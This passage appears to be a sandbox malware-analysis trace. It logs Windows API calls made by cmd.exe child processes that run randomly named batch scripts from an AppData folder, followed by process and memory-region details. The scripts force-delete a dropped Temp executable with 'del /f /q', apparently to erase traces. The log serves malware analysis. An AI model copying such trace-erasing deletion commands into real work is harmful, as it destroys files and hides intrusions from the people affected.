hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x22f408, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x22f408*=0x7c, lpOverlapped=0x0) returned 1 [0111.977] SetFilePointer (in: hFile=0x54, lDistanceToMove=83, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0111.977] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=62, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\"\r\n") returned 62 [0111.977] _get_osfhandle (_FileHandle=3) returned 0x54 [0111.977] GetFileType (hFile=0x54) returned 0x1 [0111.977] _get_osfhandle (_FileHandle=3) returned 0x54 [0111.977] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0111.978] _tell (_FileHandle=3) returned 83 [0111.978] _close (_FileHandle=3) returned 0 [0111.978] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x22f1dc | out: _Buffer="\r\n") returned 2 [0111.978] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.978] GetFileType (hFile=0x7) returned 0x2 [0111.979] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0111.979] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f19c | out: lpMode=0x22f19c) returned 1 [0111.979] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.979] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22f1c8, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x22f1c8*=0x2) returned 1 [0111.979] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0111.979] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0111.979] _vsnwprintf (in: 
_Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x22f1d8 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0111.979] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x22f1d8 | out: _Buffer=">") returned 1 [0111.979] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.979] GetFileType (hFile=0x7) returned 0x2 [0111.979] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0111.979] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f1a0 | out: lpMode=0x22f1a0) returned 1 [0111.979] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.979] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x22f1cc, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x22f1cc*=0x19) returned 1 [0111.979] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.979] GetFileType (hFile=0x7) returned 0x2 [0111.980] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0111.980] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f424 | out: lpMode=0x22f424) returned 1 [0111.980] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.980] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x42f008*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x22f450, lpReserved=0x0 | out: lpBuffer=0x42f008*, lpNumberOfCharsWritten=0x22f450*=0x3) returned 1 [0111.980] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x22f45c | out: _Buffer=" /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" ") returned 58 [0111.980] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.980] GetFileType (hFile=0x7) returned 0x2 [0111.980] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0111.980] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f41c | out: lpMode=0x22f41c) returned 1 [0111.980] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.980] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x3a, 
lpNumberOfCharsWritten=0x22f448, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x22f448*=0x3a) returned 1 [0111.980] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x22f47c | out: _Buffer="\r\n") returned 2 [0111.980] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.980] GetFileType (hFile=0x7) returned 0x2 [0111.981] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0111.981] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f43c | out: lpMode=0x22f43c) returned 1 [0111.981] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.981] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22f468, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x22f468*=0x2) returned 1 [0111.981] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0111.981] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0111.981] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0111.981] GetConsoleTitleW (in: lpConsoleTitle=0x22efec, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0111.981] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x22eda4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0111.981] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x22de34 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0111.981] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x22e064, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x22e068, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x22e064*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0111.982] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0111.982] _wcsicmp (_String1="Wtsk8WxH.exe", _String2=".") returned 73 [0111.982] _wcsicmp 
(_String1="Wtsk8WxH.exe", _String2="..") returned 73 [0111.982] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wtsk8wxh.exe")) returned 0x2020 [0111.982] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x422148 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0111.982] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp")) returned 0x2010 [0111.982] _wcsicmp (_String1="Wtsk8WxH.exe", _String2=".") returned 73 [0111.982] _wcsicmp (_String1="Wtsk8WxH.exe", _String2="..") returned 73 [0111.982] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wtsk8wxh.exe")) returned 0x2020 [0111.982] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe", fInfoLevelId=0x0, lpFindFileData=0x430554, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x430554) returned 0x410aa8 [0111.982] DeleteFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wtsk8wxh.exe")) returned 1 [0111.983] FindNextFileW (in: hFindFile=0x410aa8, lpFindFileData=0x430554 | out: lpFindFileData=0x430554) returned 0 [0111.983] GetLastError () returned 0x12 [0111.983] FindClose (in: hFindFile=0x410aa8 | out: hFindFile=0x410aa8) returned 1 [0111.983] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.983] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0111.984] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.984] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0111.984] _get_osfhandle (_FileHandle=0) returned 0x3 [0111.984] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0111.984] 
SetConsoleInputExeNameW () returned 0x1 [0111.984] GetConsoleOutputCP () returned 0x1b5 [0111.984] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0111.984] SetThreadUILanguage (LangId=0x0) returned 0x409 [0111.984] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\8Nkh0cv7.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\8nkh0cv7.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x22f424, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0111.984] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0111.984] _get_osfhandle (_FileHandle=3) returned 0x54 [0111.984] SetFilePointer (in: hFile=0x54, lDistanceToMove=83, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0111.985] _get_osfhandle (_FileHandle=3) returned 0x54 [0111.985] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0111.985] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x22f408, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x22f408*=0x3e, lpOverlapped=0x0) returned 1 [0111.985] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=62, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\"\r\n") returned 62 [0111.985] _get_osfhandle (_FileHandle=3) returned 0x54 [0111.985] GetFileType (hFile=0x54) returned 0x1 [0111.985] _get_osfhandle (_FileHandle=3) returned 0x54 [0111.985] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0111.986] _tell (_FileHandle=3) returned 145 [0111.986] _close (_FileHandle=3) returned 0 [0111.986] _vsnwprintf 
(in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x22f1dc | out: _Buffer="\r\n") returned 2 [0111.986] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.986] GetFileType (hFile=0x7) returned 0x2 [0111.986] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0111.986] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f19c | out: lpMode=0x22f19c) returned 1 [0111.987] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.987] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22f1c8, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x22f1c8*=0x2) returned 1 [0111.987] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0111.987] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x22f1d8 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0111.987] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x22f1d8 | out: _Buffer=">") returned 1 [0111.987] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.987] GetFileType (hFile=0x7) returned 0x2 [0111.987] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0111.987] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f1a0 | out: lpMode=0x22f1a0) returned 1 [0111.987] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.987] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x22f1cc, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x22f1cc*=0x19) returned 1 [0111.987] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.987] GetFileType (hFile=0x7) returned 0x2 [0111.987] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0111.988] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f424 | out: lpMode=0x22f424) returned 1 [0111.988] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.988] WriteConsoleW (in: 
hConsoleOutput=0x7, lpBuffer=0x42f008*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x22f450, lpReserved=0x0 | out: lpBuffer=0x42f008*, lpNumberOfCharsWritten=0x22f450*=0x3) returned 1 [0111.988] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x22f45c | out: _Buffer=" /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" ") returned 58 [0111.988] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.988] GetFileType (hFile=0x7) returned 0x2 [0111.988] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0111.988] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f41c | out: lpMode=0x22f41c) returned 1 [0111.988] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.988] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0x22f448, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x22f448*=0x3a) returned 1 [0111.988] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x22f47c | out: _Buffer="\r\n") returned 2 [0111.988] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.988] GetFileType (hFile=0x7) returned 0x2 [0111.988] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0111.988] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f43c | out: lpMode=0x22f43c) returned 1 [0111.989] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.989] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22f468, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x22f468*=0x2) returned 1 [0111.989] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0111.989] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0111.989] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0111.989] GetConsoleTitleW (in: lpConsoleTitle=0x22efec, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0111.989] GetCurrentDirectoryW (in: 
nBufferLength=0x106, lpBuffer=0x22eda4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0111.989] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x22de34 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0111.989] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x22e064, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x22e068, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x22e064*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0111.989] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0111.989] _wcsicmp (_String1="Wtsk8WxH.exe", _String2=".") returned 73 [0111.989] _wcsicmp (_String1="Wtsk8WxH.exe", _String2="..") returned 73 [0111.989] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wtsk8wxh.exe")) returned 0xffffffff [0111.989] GetLastError () returned 0x2 [0111.990] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x422148 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0111.990] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp")) returned 0x2010 [0111.990] _wcsicmp (_String1="Wtsk8WxH.exe", _String2=".") returned 73 [0111.990] _wcsicmp (_String1="Wtsk8WxH.exe", _String2="..") returned 73 [0111.990] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wtsk8wxh.exe")) returned 0xffffffff [0111.990] GetLastError () returned 0x2 [0111.990] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe", fInfoLevelId=0x0, lpFindFileData=0x430554, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x430554) 
returned 0xffffffff [0111.990] GetLastError () returned 0x2 [0111.990] _get_osfhandle (_FileHandle=2) returned 0xb [0111.990] GetFileType (hFile=0xb) returned 0x2 [0111.990] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0111.990] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x22ea64 | out: lpMode=0x22ea64) returned 1 [0111.990] _get_osfhandle (_FileHandle=2) returned 0xb [0111.990] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x22ea98 | out: lpConsoleScreenBufferInfo=0x22ea98) returned 1 [0111.991] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0111.991] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.991] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0111.991] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.991] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0111.991] _get_osfhandle (_FileHandle=0) returned 0x3 [0111.991] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0111.992] SetConsoleInputExeNameW () returned 0x1 [0111.992] GetConsoleOutputCP () returned 0x1b5 [0111.992] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0111.992] SetThreadUILanguage (LangId=0x0) returned 0x409 [0111.992] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\8Nkh0cv7.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\8nkh0cv7.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x22f424, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0111.992] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0111.992] _get_osfhandle (_FileHandle=3) returned 0x54 [0111.992] SetFilePointer (in: hFile=0x54, lDistanceToMove=145, 
lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0111.992] _get_osfhandle (_FileHandle=3) returned 0x54 [0111.992] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0111.992] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x22f408, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x22f408*=0x0, lpOverlapped=0x0) returned 1 [0111.992] GetLastError () returned 0x0 [0111.992] _get_osfhandle (_FileHandle=3) returned 0x54 [0111.992] GetFileType (hFile=0x54) returned 0x1 [0111.992] _get_osfhandle (_FileHandle=3) returned 0x54 [0111.992] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0111.993] _get_osfhandle (_FileHandle=3) returned 0x54 [0111.993] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0111.993] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x22f3ec, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x22f3ec*=0x0, lpOverlapped=0x0) returned 1 [0111.993] GetLastError () returned 0x0 [0111.993] _get_osfhandle (_FileHandle=3) returned 0x54 [0111.993] GetFileType (hFile=0x54) returned 0x1 [0111.993] _get_osfhandle (_FileHandle=3) returned 0x54 [0111.993] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0111.993] longjmp () [0111.993] _tell (_FileHandle=3) returned 145 [0111.993] _close (_FileHandle=3) returned 0 [0111.993] CmdBatNotification () returned 0x0 [0111.993] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.993] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0111.993] _get_osfhandle (_FileHandle=1) 
returned 0x7 [0111.993] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0111.993] _get_osfhandle (_FileHandle=0) returned 0x3 [0111.993] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0111.994] SetConsoleInputExeNameW () returned 0x1 [0111.994] GetConsoleOutputCP () returned 0x1b5 [0111.994] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0111.994] SetThreadUILanguage (LangId=0x0) returned 0x409 [0111.994] exit (_Code=0) Process: id = "36" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168c0" os_pid = "0xcec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "34" os_parent_pid = "0xcc0" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\Gy2dwmVF.cmd\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5511 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5512 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5513 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5514 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" 
Region: id = 5515 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 5516 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5517 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5518 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 5519 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 5520 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 5686 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5687 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 5688 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5689 start_va = 0x120000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 5690 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 5691 start_va = 0x6ee80000 
end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 5692 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5693 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 5694 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5695 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5696 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5697 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 5698 start_va = 0x773e0000 